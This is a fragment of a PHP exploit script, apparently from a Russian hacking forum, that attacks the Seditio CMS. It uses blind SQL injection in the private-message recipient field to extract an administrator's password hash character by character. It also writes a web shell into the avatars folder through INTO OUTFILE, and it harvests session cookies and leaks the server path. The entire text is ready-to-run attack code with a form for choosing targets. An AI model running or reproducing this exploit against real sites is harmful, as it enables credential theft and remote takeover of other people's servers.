(.*)<\/b> on/", implode(sendd($hostname, $p4.'/plug.php?e=search', 'GET', '', 'PHPSESSID=./[]')), $m)) { return str_replace('\\', '/', substr($m['1'], 0, -17)); } } function get_shell() { global $p4, $razd, $hostname, $pe4enki, $myname, $x, $shell, $fullp; $expl = 'newpmrecipient='.$myname.'\')'.$razd.'into'.$razd.'outfile'.$razd.'\''.$fullp.'\''.$razd.'fields'.$razd.'terminated'.$razd.'by'.$razd.'\'\''.$razd.'optionally'.$razd.'enclosed'.$razd.'by'.$razd.$shell.'/*&newpmtitle;=111d1&newpmtext;=333ads&x;='.$x; sendd($hostname, $p4.'/pm.php?m=send&a;=send&to;=', 'POST', $expl, $pe4enki); } function login($uname, $pass) { global $p4, $hostname; $get_cookie = sendd($hostname, $p4.'/users.php?m=auth&a;=check', 'POST', 'rusername='.$uname.'&rpassword;='.$pass.'&x;=GUEST', ''); foreach ($get_cookie as $value) { if (strpos($value, 'Set-Cookie: PHPSESSID=') !== false) { $temp = explode(";", $value); $pe4enki = strstr($temp[0], 'PHPSESSID'); } if (strpos($value, 'Set-Cookie: SEDITIO=') !== false) { $temp = explode(";", $value); $pe4enki .= '; '.strstr($temp[0], 'SEDITIO'); break; } } return trim($pe4enki); } function secret() { global $p4, $hostname, $pe4enki; if(preg_match("/
<\/div><\/form>/", implode(sendd($hostname, $p4.'/pm.php?m=send&a;=send&to;=', 'GET', '', $pe4enki)), $m)) { return $m['1']; } } //hash 48-57 97-102 function get_pass() { global $p4, $razd, $hostname, $tbl_user, $userid, $pe4enki, $myname, $x, $result; for($n = 0; ++$n <= 32;) { for($i = 47; ++$i <= 102;) { if($i == 58) $i = 97; $expl = 'newpmrecipient='.$myname.'\')'.$razd.'and((select'.$razd.'case'.$razd.'when'.$razd.'ascii(substring((select'.$razd.'user_password'.$razd.'from'.$razd.$tbl_user.$razd.'where'.$razd.'user_id='.$userid.')'.$razd.'from'.$razd.$n.$razd.'for'.$razd.'1))='.$i.$razd.'then'.$razd.'1'.$razd.'else'.$razd.'2'.$razd.'end)=1)/*&newpmtitle;=ru_antichat_by_c411k&newpmtext;=o9e6u_gema_privetkakdela_tygdepropal_izvEni&x;='.$x; if(!preg_match("/At least one recipient was wrong(.*)/", implode(sendd($hostname, $p4.'/pm.php?m=send&a;=send&to;=', 'POST', $expl, $pe4enki)))) { echo chr($i); $result .= chr($i); break; } myflush(500); } } } if (!$_GET) { echo '

	

	 ¬ hostname, for expamle "antichat.ru"
	 ¬ path to index seditio
	 ¬ admin id, default 1
	 ¬ register user login
	 ¬ register user password
	 ¬ name user table (or database.user_table) , default sed_users.
	 ¬ +, %20, /**/
	
	
	

	 ¬ full path  
	';

}


if (isset($_GET['go_fuck']))
{
	$hostname = $_POST['hostname'];
	$p4 = $_POST['path'];
	$razd = $_POST['razd'];
	$tbl_user = $_POST['prefix'];
	$userid = $_POST['userid'];
	$myname = $_POST['myname'];
	$mypwd = $_POST['mypwd'];
	$fullp = $_POST['fullp'];
	$shell = $_POST['shell'];
	//$result = array('pass' => '', 'salt' => '');
	
	if (isset($_POST['try_fullp'])) echo '
'.get_fullp().'datas/avatars/out.php';
	
	if (isset($_POST['get_hash']))
	{
		$pe4enki = login($myname, $mypwd);
		echo '
cookies: '.$pe4enki.'
';
		myflush(500);
		
		$x = secret();
		echo 'o9e6u: '.$x.'
';
		myflush(500);
		
		echo '
password hash (md5): ';
		get_pass();
	}
	
	if (isset($_POST['get_shell']))
	{
		$pe4enki = login($myname, $mypwd);
		echo '
cookies: '.$pe4enki.'
';
		myflush(500);
		
		$x = secret();
		echo 'o9e6u: '.$x.'
';
		myflush(500);
		
		$shell = '0x'.bin2hex(stripslashes(trim($shell)));
		get_shell();
		echo '
check: '.$hostname.'/'.$p4.'/datas/avatars/out.php';
	}
}

?>